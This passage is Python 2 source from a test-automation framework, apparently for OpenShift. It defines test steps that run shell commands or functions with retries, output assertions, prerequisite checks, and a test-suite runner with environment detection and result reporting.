continue.\"\"\"\n self._ui.abort(msg)\n self._report.abort(msg)\n #raise TestSuiteAbort\n return ABORT\n\n def debug(self, msg):\n \"\"\"Call this to record non-critical information in the report object.\"\"\"\n #print >> sys.stderr, \"DEBUG:\",msg \n self._ui.info(msg)\n self._report.info(msg)\n\n def info(self, msg):\n \"\"\"Call this to record non-critical information in the report object.\"\"\"\n self._ui.info(msg)\n self._report.info(msg)\n\n def step(self, msg):\n \"\"\"Call this to mark the beginning of one step\"\"\"\n self._ui.info(msg.center(60, '='))\n self._report.info(msg.center(60, '='))\n \n def verboseinfo(self, msg):\n \"\"\"Call this to record really non-critical information in the report\n object that is only emitted when the VERBOSE flag is enabled in the\n configuration.\"\"\"\n if self._verbose:\n self._ui.info(msg)\n self._report.info(msg)\n\n def diagnostic(self, msg):\n \"\"\"Call this one or more times if a failed condition is detected, and\n you want to record in the report some pertinent diagnostic information.\n Then return with a FAIL message.\"\"\"\n self._ui.diagnostic(msg)\n self._report.diagnostic(msg)\n\n def error(self, msg):\n \"\"\"Call this to record errors the report object.\"\"\"\n self._ui.error(\"ERROR: %s\" % msg)\n self._report.add_message(\"ERROR\", msg)\n\n # user input methods. 
May only be used for tests flagged as INTERACTIVE.\n def user_input(self, prompt=None):\n if self.INTERACTIVE:\n return self._ui.user_input(prompt)\n else:\n raise TestIncompleteError, \"user input in non-interactive test.\"\n\n def choose(self, somelist, defidx=0, prompt=None):\n if self.INTERACTIVE:\n return self._ui.choose(somelist, defidx, prompt)\n else:\n raise TestIncompleteError, \"user input in non-interactive test.\"\n \n def get_text(self, msg=None):\n if self.INTERACTIVE:\n return self._ui.get_text(msg)\n else:\n raise TestIncompleteError, \"user input in non-interactive test.\"\n\n def get_value(self, prompt, default=None):\n if self.INTERACTIVE:\n return self._ui.get_input(prompt, default)\n else:\n raise TestIncompleteError, \"user input in non-interactive test.\"\n\n def yes_no(self, prompt, default=True):\n if self.INTERACTIVE:\n return self._ui.yes_no()\n else:\n raise TestIncompleteError, \"user input in non-interactive test.\"\n\n def get_key(self, prompt=None, timeout=None, default=\"\"):\n if self.INTERACTIVE:\n return self._ui.get_key(prompt, timeout, default)\n else:\n raise TestIncompleteError, \"user input in non-interactive test.\"\n\n def display(self, line):\n if self.INTERACTIVE:\n return self._ui.display(line)\n else:\n raise TestIncompleteError, \"user input in non-interactive test.\"\n\n def Print(self, *args):\n if self.INTERACTIVE:\n return self._ui.Print(*args)\n else:\n raise TestIncompleteError, \"user input in non-interactive test.\"\n\n # assertion methods make it convenient to check conditions.\n def assert_passed(self, arg, msg=None):\n if arg != PASSED:\n raise TestFailError, msg or \"Did not pass test.\"\n\n def assert_completed(self, arg, msg=None):\n if arg != COMPLETED:\n raise TestFailError, msg or \"Did not complete test.\"\n\n def assert_failed(self, arg, msg=None):\n if arg != FAILED:\n raise TestFailError, msg or \"Did not pass test.\"\n\n def assert_equal(self, arg1, arg2, msg=None):\n if arg1 != arg2:\n raise TestFailError, msg or \"%s != %s\" % (arg1, arg2)\n\n def assert_not_equal(self, arg1, arg2, msg=None):\n if arg1 == arg2:\n raise TestFailError, msg or \"%s == %s\" % (arg1, arg2)\n assert_notequal = assert_not_equal # alias\n\n def assert_true(self, arg, msg=None):\n if not arg:\n raise TestFailError, msg or \"%s not true.\" % (arg,)\n\n def assert_false(self, arg, msg=None):\n if arg:\n raise TestFailError, msg or \"%s not false.\" % (arg,)\n\n def assert_approximately_equal(self, arg1, arg2, fudge=None, msg=None):\n if fudge is None:\n fudge = arg1*0.05 # default 5% of arg1\n if abs(arg1-arg2) > fudge:\n raise TestFailError, msg or \"%s and %s not within %s units of each other.\" % (arg1, arg2, fudge)\n\n def assert_match(self, list_arg, arg, msg=None):\n if type(list_arg) == str:\n list_arg = [list_arg]\n for t in list_arg:\n if not re.search(r\"%s\"%t, arg):\n raise TestFailError, msg or \"Failed to match '%s' in given output.\" % (t)\n\n def assert_not_match(self, list_arg, arg, msg=None):\n if type(list_arg) == str:\n list_arg = [list_arg]\n for t in list_arg:\n if re.search(r\"%s\"%t, arg):\n raise TestFailError, msg or \"Should not match '%s' in given output.\" % (t)\n\n\n # some logical aliases\n fail_if_equal = assert_not_equal\n fail_if_not_equal = assert_equal\n assert_not_true = assert_false\n assert_not_false = assert_true\n\n def get_output_from_last_step(self):\n \"\"\"\n Returns the output from the previous step if there is any. 
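        Usage sketch: call last = self.get_output_from_last_step() from a
        test after run_steps() has executed the queued TestStep objects.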
\n \"\"\"\n if self._steps_output.has_key(len(self._steps_output)):\n return self._steps_output[len(self._steps_output)]\n else:\n return None\n\n def run_steps(self):\n self.__OUTPUT__ = [None] # first item should be empty, cause we count steps from 1\n self.__PARSED_VARS__ = {}\n i=1\n for step in self._steps:\n self.debug(\"*\"*80)\n self.debug(\"STEP[%s]: %s\"%(i, step.description))\n step._run() #in case of any problems it should raise exception \n #(e.g. TestFailError if fail) which will be handled by upper class (rhtest)\n step.step_id=i\n self.debug(\"STEP[%s] - DONE\"%i)\n self.debug(\"*\"*80)\n self._steps_output[i]=step.get_output()\n i=i+1\n\n return self.passed()\n\n def add_step(self, description, command, function_parameters=None, expect_description=\"\", expect_return=None, expect_str=None, expect_istr=None, unexpect_str=None, unexpect_istr=None, try_count=1, try_interval=5, output_filter=None, string_parameters=None):\n \"\"\"\n Support for old testcase.TestCaseStep functionality\n\n expect_str: (either string or list )\n \"expected string A\"\n or\n [\"expected string A\", \"expected string B\"]\n or\n \"/regular expression A/\"\n or\n [\"/regular expression A/\", \"regular expression B\"]\n or\n [\"expected string A\", \"regular expression B\"]\n\n - returns TestStep object\n \"\"\"\n self._steps.append(TestStep(self,\n description,\n command,\n function_parameters = function_parameters,\n expect_description = expect_description, \n expect_return = expect_return, \n expect_str = expect_str,\n expect_istr = expect_istr,\n unexpect_str = unexpect_str,\n unexpect_istr = unexpect_istr,\n string_parameters = string_parameters,\n try_interval = try_interval,\n try_count = try_count,\n output_filter = output_filter))\n\n return self._steps[len(self._steps)-1]\n\nclass RhTestLogger(object):\n \"\"\"\n\n \"\"\"\n _ui = None\n _report = None\n\n def __init__(self, ui, report):\n self._ui = ui\n self._report = report\n\n def info(self, msg):\n self._ui.info(msg)\n self._report.info(msg)\n\n def debug(self, msg):\n self._ui.diagnostic(msg)\n self._report.diagnostic(msg)\n\n def diagnostic(self, msg):\n self._ui.diagnostic(msg)\n self._report.diagnostic(msg)\n\n def error(self, msg):\n self._ui.error(msg)\n self._report.error(msg)\n\n\n\nclass TestStep(object):\n '''\n Step definition\n '''\n output = None\n retstatus = None\n function_parameters_kwargs = None\n\n def __init__(self, rhtest_obj, description, command, function_parameters=None, expect_description=\"\", expect_return=None, expect_str=None, unexpect_str=None, expect_istr=None, unexpect_istr=None, try_count=1, try_interval=5, output_filter=None, string_parameters=None):\n self.rhtest_obj = rhtest_obj\n self.info = rhtest_obj.info #let's use the same info fnuction as rhtest for logging\n self.debug = rhtest_obj.debug #let's use the same info fnuction as rhtest for logging\n self.error = rhtest_obj.error #let's use the same info fnuction as rhtest for logging\n self.description = description\n self.command = command\n\n self.function_kw_parameters = None\n if (isinstance(string_parameters, str)):\n self.string_parameters = [string_parameters]\n else:\n self.string_parameters = string_parameters\n if (isinstance(function_parameters,str)):\n self.function_parameters = [function_parameters]\n elif (isinstance(function_parameters, list)):\n self.function_parameters = function_parameters \n elif (isinstance(function_parameters, dict)): #only for functions\n self.function_kw_parameters = function_parameters \n 
self.function_parameters = None\n elif function_parameters is None:\n self.function_parameters = None\n else:\n raise TypeError(\"Invalid function_parameters - possible types=[None, str, list, dict]\")\n\n self.expect_description = expect_description\n self.expect_return = expect_return\n self.expect_str = expect_str\n self.unexpect_str = unexpect_str\n self.expect_istr = expect_istr\n self.unexpect_istr = unexpect_istr\n self.try_count = try_count\n self.try_interval = try_interval\n self.output_filter = output_filter\n\n def get_output(self):\n return self.output\n\n def get_retstatus(self):\n return self.retstatus\n\n def __call__(self, *args, **kwargs):\n \"\"\"\n Wrapper for _run() used by individual execution\n - returns (status, output)\n - throws exceptions only when this step requires checking (defined *expect_* parameters in add_step(*) method)\n \"\"\"\n if args is not None and len(args)>0:\n self.function_parameters = args #overwrite default function_parameters\n self.function_parameters_kwargs = kwargs #merge/overwrite default function_parameters\n self.debug(\"-\"*80)\n self.debug(\"STEP: %s\"%(self.description))\n self.debug(\"-\"*80)\n self._run()\n\n return (self.retstatus, self.output)\n\n def eval_parameters_list(self, parameters_list):\n self.debug('Eval parameters of string type...')\n temp = []\n if parameters_list is None:\n return\n for parameter in parameters_list:\n if isinstance(parameter, str):\n re_match_obj = re.match(r\"^__OUTPUT__(\\[[^\\[\\]]+\\])+$\", parameter)\n if re_match_obj != None:\n parameter = parameter.replace(\"__OUTPUT__\", \"self.rhtest_obj.__OUTPUT__\")\n parameter = eval(parameter)\n else:\n parameter = re.sub(r\"__OUTPUT__(\\[[^\\[\\]]+\\])+\", self.repl, parameter)\n #__PARSED_VARS__\n re_match_obj = re.match(r\"^__PARSED_VARS__(\\[[^\\[\\]]+\\])+$\", parameter)\n if re_match_obj != None:\n parameter = parameter.replace(\"__PARSED_VARS__\", \"self.rhtest_obj.__PARSED_VARS__\")\n parameter = eval(parameter)\n else:\n parameter = re.sub(r\"__PARSED_VARS__(\\[[^\\[\\]]+\\])+\", self.repl, parameter)\n else:\n pass\n temp.append(parameter)\n\n self.debug('Parameters after evaluation[1]: %s'%temp)\n return temp\n\n def repl(self, matchobj):\n if matchobj != None:\n self.debug('''Found '__OUTPUT__|__PARSED_VARS__' keyword, replace it''')\n #hack to avoid using global vars!\n s = matchobj.group(0).replace(\"__OUTPUT__\", \"self.rhtest_obj.__OUTPUT__\")\n s = s.replace(\"__PARSED_VARS__\",\"self.rhtest_obj.__PARSED_VARS__\")\n return eval(s)\n\n def eval_command_string(self, command_line):\n #self.debug('Evaluating command string...')\n cmd_after_eval = re.sub(r\"__OUTPUT__(\\[[^\\[\\]]+\\])+\", self.repl, command_line)\n cmd_after_eval = re.sub(r\"__PARSED_VARS__(\\[[^\\[\\]]+\\])+\", self.repl, cmd_after_eval)\n #self.debug('Command after evaluation: %s'%cmd_after_eval)\n return cmd_after_eval\n\n def _run(self):\n \"\"\"\n Executes the function or shell command.\n - returns nothing\n - used by Test.run_steps() - for internal calls \n - throws exceptions when expected conditions fail (expect_return, ...)\n \"\"\"\n if len(self.expect_description) > 0:\n self.debug(\"Expectation: %s\"%self.expect_description)\n #try to EVAL __OUTPUT__ and PARSED__VARS__\n try:\n self.function_parameters = self.eval_parameters_list(self.function_parameters)\n except Exception as e:\n self.error(str(e))\n raise e\n try:\n #\n # let's try to exec functions/closeures if present\n #\n if self.function_parameters is not None:\n executed = False\n l_params = []\n for p 
in self.function_parameters:\n if inspect.isfunction(p) or inspect.ismethod(p):\n self.debug(\"Found closure! Execute `%s' parameter as function.\"%p)\n res = p()\n l_params.append(res)\n executed = True\n else:\n l_params.append(p)\n\n self.function_parameters = l_params\n if executed:\n self.debug(\"Parameters after evaluation[2]: %s\"%self.function_parameters)\n except:\n self.debug(\"-\"*80)\n traceback.print_exc(file=sys.stderr)\n self.debug(\"-\"*80)\n raise TestIncompleteError(\"Unable to evaluate closures in %s\"%self.function_parameters)\n\n attempts = self.try_count\n if isinstance(self.command, str) or isinstance(self.command, unicode):\n\n if self.string_parameters:\n self.debug(\"String %s expansion...\")\n l_params = [] #for expansion\n for p in self.string_parameters:\n if inspect.isfunction(p):\n l_params.append(p())\n else:\n l_params.append(p)\n try:\n #make a quoted string\n #TODO: check what kind of quotes have been used and based on that make fixes\n l_params = \",\".join(map(lambda x: '\"'+x+'\"', l_params))\n self.debug(\"String expansion/array before: %s\"%l_params)\n str2exec = 'self.command=self.command%%(%s)'%l_params\n self.debug(\"String expansion/after: %s\"%str2exec)\n #and do the expansion...\n exec(str2exec)\n except Exception as e:\n self.error(\"Unable to expand command: %s\"%str(e))\n raise TestIncompleteError(\"Unable to string expansion in %s\"%self.function_parameters)\n\n try:\n self.command = self.eval_command_string(self.command)\n except Exception as e:\n self.error(\"Error during evaluating shell string\"%(str(e)))\n raise e\n\n self.debug(\"Executing SHELL: %s\"%self.command)\n\n while True:\n command = self.command\n self.debug(\"Attempt #%d\"%(self.try_count-attempts+1))\n if self.function_parameters is not None and len(self.function_parameters)>0:\n for a in self.function_parameters:\n command = command.replace(\"%s\", a, 1)\n (self.retstatus, self.output) = cmd_get_status_output(command)\n attempts -= 1\n if attempts == 0:\n break\n try:\n self._verify_step(dry=True)\n break\n except:\n pass\n time.sleep(self.try_interval)\n\n elif inspect.isfunction(self.command) or inspect.ismethod(self.command):\n self.debug(\"Executing FUNCTION: %s\"%self.command.__name__)\n while True:\n #TODO:start to intercept stdout/stderr\n self.debug(\"Attempt #%d\"%(self.try_count-attempts+1))\n if self.function_parameters is not None and self.function_parameters_kwargs is not None:\n self.retstatus = self.command(*self.function_parameters, **self.function_parameters_kwargs)\n elif self.function_parameters is not None:\n self.retstatus = self.command(*self.function_parameters)\n elif self.function_parameters_kwargs is not None:\n self.retstatus = self.command(**self.function_parameters_kwargs)\n else:\n self.retstatus = self.command()\n\n attempts -= 1\n if attempts == 0:\n break\n try:\n self._verify_step(dry=True)\n break\n except:\n pass\n time.sleep(self.try_interval)\n self.output = \"Fun_None_Output\" #we cannot capture output\n\n #TODO:stop of interception\n\n #append output into __OUTPUT__ for legacy support\n try:\n if self.output == \"Fun_None_Output\":\n if (self.output_filter):\n self.rhtest_obj.__OUTPUT__.append(self.filter_output(self.retstatus, self.output_filter))\n else:\n self.rhtest_obj.__OUTPUT__.append(self.retstatus)\n else:\n if (self.output_filter):\n self.rhtest_obj.__OUTPUT__.append(self.filter_output(self.output, self.output_filter))\n else:\n self.rhtest_obj.__OUTPUT__.append(self.output)\n except:\n pass\n self._verify_step(dry=False) 
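        # note: _verify_step() ignores its dry flag internally; the retry
        # loops above simply swallow its exceptions to decide whether to
        # retry, while any exception from this final call propagates as
        # the step's verdict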
#real verification...\n\n \n def _verify_step(self, dry=False):\n \"\"\"\n Throws exceptions if given conditions are not met with requirements\n \"\"\"\n #checking the return value\n if self.expect_return is not None:\n retstatus = self.retstatus\n # if it is array, let's check the first value...\n if isinstance(self.retstatus, list) or isinstance(self.retstatus, tuple):\n retstatus = self.retstatus[0]\n\n if isinstance(self.expect_return, list) or isinstance(self.expect_return, tuple):\n self.error(\"TODO: Not yet implemented\")\n #TODO\n\n if isinstance(self.expect_return, int): \n self.rhtest_obj.assert_equal(retstatus, \n self.expect_return, \n \"Expected return: %d, got %s\"%\n (self.expect_return, retstatus))\n elif isinstance(self.expect_return, unicode) or isinstance(self.expect_return, str): \n obj = re.search(r\"^!(\\d+)\",self.expect_return)\n if obj:\n self.rhtest_obj.assert_not_equal(int(retstatus), \n int(obj.group(1)), \n \"Expected return: %s, got %s\"%\n (self.expect_return, retstatus))\n else: #just compare two strings\n self.rhtest_obj.assert_equal(retstatus,\n self.expect_return, \n \"Expected return: %s, got %s\"%\n (self.expect_return, retstatus))\n else:\n self.error(\"Unknown `expect_return` type: %s\"%type(self.expect_return))\n else:\n self.debug(\"No checking of return value...\")\n\n if self.output is None:\n self.output = ''\n #checking the return value\n if self.expect_str:\n if self.output == \"Fun_None_Output\":\n print \"WARNING: Unable to check STDOUT from function call! Fix the script or ignore it if you do it intentionally.\"\n if isinstance(self.expect_str, str) or isinstance(self.expect_str, unicode):\n self.rhtest_obj.assert_match(self.expect_str, self.output, \"Unable to find `%s` string in the output.\"%self.expect_str)\n if isinstance(self.expect_str, list):\n for s in self.expect_str:\n self.rhtest_obj.assert_match(s, self.output, \"Unable to find `%s` string in the output.\"%s)\n\n if self.unexpect_str:\n if self.output == \"Fun_None_Output\":\n print \"WARNING: Unable to check STDOUT from function call! 
Fix the script or ignore it if you do it intentionally.\"\n if isinstance(self.unexpect_str, str) or isinstance(self.unexpect_str, unicode):\n self.rhtest_obj.assert_not_match(self.unexpect_str, self.output, \"Unexpected match of `%s` in output.\"%self.unexpect_str)\n if isinstance(self.unexpect_str, list):\n for s in self.unexpect_str:\n self.rhtest_obj.assert_not_match(s, self.output, \"Unexpected match of `%s` in output.\"%s)\n\n #if there is no verification, let's notify the user\n if sum(map(self.__dict__.has_key, ('expect_str',\n 'expect_istr',\n 'expect_return',\n 'unexpect_str',\n 'unexpect_istr'))) == 0:\n self.info(\"Nothing to verify in this step -> just executed\")\n self._nothing4checking = True\n\n\n def filter_output(self, output, filter_reg):\n if filter_reg != None:\n search_obj = re.search(r\"%s\" %(filter_reg), output, re.M)\n if search_obj != None:\n ret_output = search_obj.group(0)\n self.debug(\"According to output filter - [%s], return [%s]\" %(filter_reg, ret_output))\n else:\n ret_output = \"\"\n self.debug(\"According to output filter - [%s], return empty string\" %(filter_reg))\n else:\n ret_output = output\n return ret_output\n\n \n\nclass PreReq(object):\n \"\"\"A holder for test prerequiste.\"\"\"\n def __init__(self, name, *args, **kwargs):\n self.name = name\n self.args = args\n self.kwargs = kwargs\n\n def __repr__(self):\n return \"%s(%r, %r, %r)\" % (self.__class__.__name__, self.name, self.args, self.kwargs)\n\n def __str__(self):\n return repr_test(self.name, self.args, self.kwargs)\n\n\n# holds an instance of a Test class and the parameters it will be called with.\n# This actually calls the test, and stores the result value for later summary.\n# It also supports pre-requisite matching.\nclass _TestEntry(object):\n def __init__(self, inst, args=None, kwargs=None):\n self.inst = inst\n self.args = args or ()\n self.kwargs = kwargs or {}\n self.result = None\n\n def __call__(self):\n try:\n self.result = apply(self.inst, self.args, self.kwargs)\n except KeyboardInterrupt:\n self.result = ABORT\n raise\n return self.result\n\n def __eq__(self, other):\n return self.inst == other.inst\n\n def matches(self, name, args, kwargs):\n return (name, args, kwargs) == (self.inst._testname, self.args, self.kwargs)\n\n def match_prerequisite(self, prereq):\n \"Does this test match the specified prerequisite?\"\n return (self.inst._testname, self.args, self.kwargs) == (prereq.name, prereq.args, prereq.kwargs)\n\n def get_result(self):\n return self.result\n\n def prerequisites(self):\n return self.inst.prerequisites()\n\n def abort(self):\n self.result = self.inst.abort(\"Abort forced by suite runner.\")\n return self.result\n\n def was_aborted(self):\n return self.result == ABORT\n\n def name(self):\n return self.inst._testname\n\n def get_values(self):\n return self.inst._testname, self.args, self.kwargs, self.result\n\n def __repr__(self):\n return repr_test(self.inst._testname, self.args, self.kwargs)\n\nclass _SuiteEntry(_TestEntry):\n def get_result(self):\n # self.result is a list in this case\n self.results = self.inst.results()\n for res in self.results:\n if res != PASSED:\n return res\n return PASSED\n\ndef repr_test(name, args, kwargs):\n args_s = IF(args, \n IF(kwargs, \"%s, \", \"%s\") % \", \".join(map(repr, args)),\n \"\")\n kws = \", \".join(map(lambda it: \"%s=%r\" % (it[0], it[1]), kwargs.items()))\n return \"%s()(%s%s)\" % (name, args_s, kws)\n\n\nclass TestSuite(object):\n \"\"\"TestSuite(config)\n A TestSuite contains a set of test cases 
    (subclasses of Test class objects)
    that are run sequentially, in the order added. It monitors the abort status of each
    test, and aborts the suite if required.

    To run it, create a TestSuite object (or a subclass with some methods
    overridden), add tests with the 'add_test()' method, and then call the
    instance. The 'initialize()' method will be run with the arguments given when
    called.

    \"\"\"
    def __init__(self, cf, nested=0):
        self.config = cf
        self.report = cf.report
        self._debug = cf.options.DEBUG
        self._verbose = cf.options.VERBOSE
        self._tests = []
        self._nested = nested
        self.suite_name = self.__class__.__name__
        self._testbed_needed = None

    def __iter__(self):
        return iter(self._tests)

    def set_config(self, cf):
        self.config = cf

    def add_test(self, _testclass, *args, **kw):
        \"\"\"add_test(Test, [args], [kwargs])
        Appends a test object to this suite. The test's test_method() will be called
        with the arguments supplied here. If the test case has a prerequisite defined
        it is checked for existence in the suite, and an exception is raised if it is
        not found.\"\"\"
        if _testclass.INTERACTIVE and self.config.flags.NOINTERACTIVE:
            print >>sys.stderr, \"%s is an interactive test and NOINTERACTIVE is set. Skipping.\" % (_testclass.__name__,)
            return
        testinstance = _testclass(self.config)
        entry = _TestEntry(testinstance, args, kw)
        self._verify_new(entry)
        self._tests.append(entry)

    def _verify_new(self, entry):
        prereqs = entry.prerequisites()
        count = 0
        for prereq in entry.prerequisites():
            for te in self._tests:
                if te.match_prerequisite(prereq):
                    count += 1
        if count < len(prereqs):
            raise TestSuiteAbort, \"unable to add test case %s, prerequisite not already added!\" % (entry, )

    def add_suite(self, suite, *args, **kw):
        \"\"\"add_suite(TestSuite, [args], [kwargs])
        Appends an embedded test suite to this suite.\"\"\"
        if type(suite) is type(Test): # class type
            suite = suite(self.config, 1)
        else:
            suite.config = self.config
            suite._nested = 1
        self._tests.append(_SuiteEntry(suite, args, kw))
        suite.test_name = \"%s%s\" % (suite.__class__.__name__, len(self._tests)-1)
        return suite

    def add(self, klass, *args, **kw):
        \"\"\"add(classobj, [args], [kwargs])
        Most general method to add test case classes or other test suites.\"\"\"
        if issubclass(klass, Test):
            self.add_test(klass, *args, **kw)
        elif issubclass(klass, TestSuite):
            self.add_suite(klass, *args, **kw)
        else:
            raise ValueError, \"TestSuite.add: invalid class type.\"

    def get_tests(self):
        \"\"\"Return a list of the test objects currently in this suite.\"\"\"
        return self._tests[:]

    def get_test(self, name, *args, **kwargs):
        for entry in self._tests:
            if entry.matches(name, args, kwargs):
                return entry
        return None

    def info(self, msg):
        \"\"\"info(msg)
        Put an informational message in the test report.\"\"\"
        self.config.userinterface.info(msg)
        self.report.info(msg)

    def error(self, msg):
        self.config.userinterface.error(\"ERROR: %s\" % msg)
        self.report.add_message(\"ERROR\", msg)

    def prerequisites(self):
        \"\"\"Get the list of prerequisites, which could be empty. Primarily
        used by nested suites.\"\"\"
        return getattr(self, \"PREREQUISITES\", [])

    # this is the primary way to invoke a suite of tests. 
call the instance.\n # Any supplied parameters are passed onto the suite's initialize()\n # method.\n def __call__(self, *args, **kwargs):\n try:\n self._initialize(args, kwargs)\n rv = self.run_tests()\n except TestSuiteWaived, rv:\n #nasty hack to update TCMS if exception occurs in Suite()\n #TODO: implement update_testcaserun() in TestSuite() scope !!!\n try:\n self._tests[0].inst.update_testcaserun('WAIVED')\n except:\n pass\n self.error(\"Suite waived: %s\" % (rv,))\n rv = WAIVED\n except TestSuiteAbort, rv:\n #nasty hack to update TCMS if exception occurs in Suite()\n #TODO: implement update_testcaserun() in TestSuite() scope !!!\n try:\n self._tests[0].inst.update_testcaserun()\n except:\n pass\n self.error(\"Suite aborted: %s\" % (rv,))\n traceback.print_exc(file=sys.stderr)\n rv = INCOMPLETE\n except Exception, rv:\n #if 1:\n # ex, val, tb = sys.exc_info()\n # debugger.post_mortem(ex, val, tb)\n #nasty hack to update TCMS if exception occurs in Suite()\n #TODO: implement update_testcaserun() in TestSuite() scope !!!\n try:\n self._tests[0].inst.update_testcaserun()\n except:\n pass\n self.error(\"General Exception - aborted: %s\" % (rv,))\n traceback.print_exc(file=sys.stderr)\n rv = INCOMPLETE\n finally:\n pass #self._finalize()\n # do finalize() regardless\n self._finalize()\n return rv\n #return PASSED # suite ran without exception...\n\n\n def _initialize(self, args, kwargs):\n \"\"\" TestSuite \"\"\"\n self.report.add_heading(\"Test suite: %s\" % self.__class__.__name__, 1)\n #setup the run_mode\n if self.config.instance_info['ip'] == 'int.openshift.redhat.com':\n self.config.options.run_mode = 'INT'\n elif self.config.instance_info['ip'] == 'stg.openshift.redhat.com':\n self.config.options.run_mode = 'STG'\n elif self.config.instance_info['ip'] == 'openshift.redhat.com':\n self.config.options.run_mode = 'PROD'\n elif self.config.instance_info['ip'].find(\"example.com\") != -1 or self.config.instance_info['ip'].find(\"test.com\") != -1 or self.config.instance_info['ip'].find(\"broker\") != -1: \n self.config.options.run_mode = 'OnPremise'\n else: \n self.config.options.run_mode = 'DEV'\n\n self.verify_testbed()\n #if self._testbed_needed:\n # self.report.add_message(\"TESTBED\", self.config.testbed.name)\n # initialize the suite\n try:\n rv = self.initialize(*args, **kwargs)\n except KeyboardInterrupt:\n self.info(\"Suite aborted by user in initialize().\")\n raise TestSuiteAbort\n except:\n ex, val, tb = sys.exc_info()\n if self._debug:\n ex, val, tb = sys.exc_info()\n debugger.post_mortem(ex, val, tb)\n self.error(\"Suite failed to initialize: %s (%s)\" % (ex, val))\n raise TestSuiteAbort, val\n # run all the tests\n\n # verify any prerequisites are met at run time. Note that this\n # currently only checks this particular suite.\n def check_prerequisites(self, currententry, upto):\n for prereq in currententry.prerequisites():\n for entry in self._tests[:upto]:\n if entry.match_prerequisite(prereq):\n if entry.result == PASSED:\n continue\n else:\n self.report.add_heading(repr(currententry), 2)\n self.info(\"WARNING: prerequisite of %s did not pass.\" % (currententry,))\n self.info(\"%s: %s\" % (prereq, entry.result))\n currententry.abort()\n return False\n return True # no prerequisite\n \n def testbed_will_work(self, itest):\n \"\"\"\n check if the ITEST directive matches the ip. 
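(ITEST may be a single string\n        such as \"PROD\" or a list such as [\"INT\", \"STG\"]; those values are only\n        illustrative. See the isinstance() handling below.)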
\n for PROD only ip that contains openshift.redhat.com will work\n for STG: only ip that contains stg.openshift.redhat.com will work\n \"\"\"\n if itest == None:\n raise Exception(\"Unable to check testbed. ITEST property is not defined.\")\n\n tb_will_work = False\n env_list = []\n if isinstance(itest,str):\n env_list.append(itest)\n elif isinstance(itest,list):\n env_list = itest\n else:\n raise Exception(\"Unknown ITEST type. Only str|list types are supported.\")\n \n for env_type in env_list:\n if env_type:\n if env_type == 'PROD':\n if 'openshift.redhat.com' in self.config.instance_info['ip']:\n tb_will_work = True\n break\n elif env_type == 'INT':\n if 'int.openshift.redhat.com' in self.config.instance_info['ip']:\n tb_will_work = True\n break\n elif env_type == 'STG':\n if 'stg.openshift.redhat.com' in self.config.instance_info['ip']:\n tb_will_work = True\n break\n elif env_type == 'DEV':\n if self.config.instance_info['ip'] not in ('stg.openshift.redhat.com', 'int.openshift.redhat.com','openshift.redhat.com' ):\n tb_will_work = True\n break\n elif env_type is None:\n tb_will_work = True\n break\n\n return tb_will_work\n\n def verify_testbed(self):\n for entry in self._tests:\n if entry.inst.ITEST and not self.testbed_will_work(entry.inst.ITEST):\n reason = \"Test can't run in this environment\"\n raise TestSuiteWaived, \"Cannot use testbed %s: %s\" % (entry.inst.ITEST, reason)\n\n def run_tests(self):\n rv = PASSED\n for i, entry in enumerate(self._tests):\n if not self.check_prerequisites(entry, i):\n continue\n try:\n # XXX put back later\n #self.config.logfile.note(\"%s: %r\" % (timelib.localtimestamp(), entry))\n \"\"\"\n print entry.args, len(entry.args)\n if len(entry.args) > 0:\n self.config.tc_args = eval(entry.args[0])\n else:\n self.config.tc_args = {}\n \"\"\"\n rv = entry()\n except KeyboardInterrupt:\n self.info(\"Test suite aborted by user.\")\n rv = ABORT\n if self._nested:\n raise TestSuiteAbort, \"aborted by user\"\n else:\n break\n except TestSuiteAbort, err:\n self.info(\"Suite aborted by test %s (%s).\" % (entry.name(), err))\n rv = ABORT\n # this should only happen with incorrectly written test_method().\n if rv is None:\n self.report.diagnostic(\"warning: test returned None, assuming failed. 
Please fix the %s.test_method()\" % (entry.name()))\n                rv = FAILED\n            # keep return value in results\n            # check for abort condition and abort if so\n            if rv == ABORT:\n                break\n        if self.config.options.TCMS:\n            # mark the test suite as finished and record the total time\n            testrun_id = self.config.testrun_res[0]['run_id']\n            tcms = self.config.tcms_obj\n            params = {'status': 1, 'estimated_time': self.config.total_time }\n            tcms.update_testrun(testrun_id, params)\n\n        return rv\n\n    def _finalize(self):\n        # finalize the suite\n        try:\n            self.finalize()\n        except KeyboardInterrupt:\n            if self._nested:\n                raise TestSuiteAbort, \"Suite '%s' aborted by user in finalize().\" % (self.suite_name,)\n            else:\n                self.info(\"Suite aborted by user in finalize().\")\n        except:\n            ex, val, tb = sys.exc_info()\n            if self._debug:\n                debugger.post_mortem(ex, val, tb)\n            self.info(\"Suite failed to finalize: %s (%s)\" % (ex, val))\n            if self._nested:\n                raise TestSuiteAbort, \"subordinate suite '%s' failed to finalize.\" % (self.suite_name,)\n        self._report_summary()\n\n    def _report_summary(self):\n        ui = self.config.userinterface\n        self.report.add_heading(\"Summarized results for %s.\" % self.__class__.__name__, 2)\n        ui.Print(\"Summarized results for %s.\" % self.__class__.__name__)\n\n        msg = []\n        for entry in self._tests:\n            res = entry.get_result()\n            if res == PASSED:\n                msg.append(\"%50s: PASSED\" % (entry,))\n                ui.printf(\"%50s: %%GPASSED%%N\" % (entry,))\n            elif res == FAILED:\n                msg.append(\"%50s: FAILED\" % (entry,))\n                ui.printf(\"%50s: %%RFAILED%%N\" % (entry,))\n            elif res == INCOMPLETE:\n                msg.append(\"%50s: INCOMPLETE\" % (entry,))\n                ui.printf(\"%50s: %%YINCOMPLETE%%N\" % (entry,))\n            elif res == COMPLETED:\n                msg.append(\"%50s: COMPLETED\" % (entry,))\n                ui.printf(\"%50s: %%GCOMPLETED%%N\" % (entry,))\n            elif res == ABORT:\n                msg.append(\"%50s: ABORTED\" % (entry,))\n                ui.printf(\"%50s: %%yABORTED%%N\" % (entry,))\n            elif res is None:\n                pass # test case did not run\n            else:\n                msg.append(\"%50s: strange test result value of: %s\" % (entry, res))\n        msg.append(\"%50s %.2f seconds\" % ('SUITETIME:', self.config.total_time))\n        msg.append(\"\\n\")\n        ui.printf(\"%50s %.2f seconds\" % ('SUITETIME:', self.config.total_time))\n        self.report.add_summary(\"\\n\".join(msg))\n\n    def results(self):\n        return map(lambda t: t.get_result(), self._tests)\n\n    def __str__(self):\n        s = [\"Tests in suite:\"]\n        s.extend(map(str, self._tests))\n        return \"\\n\".join(s)\n\n    ### overrideable interface.\n    def initialize(self, *args):\n        \"\"\"Override this if you need to do some initialization just before the\nsuite is run. 
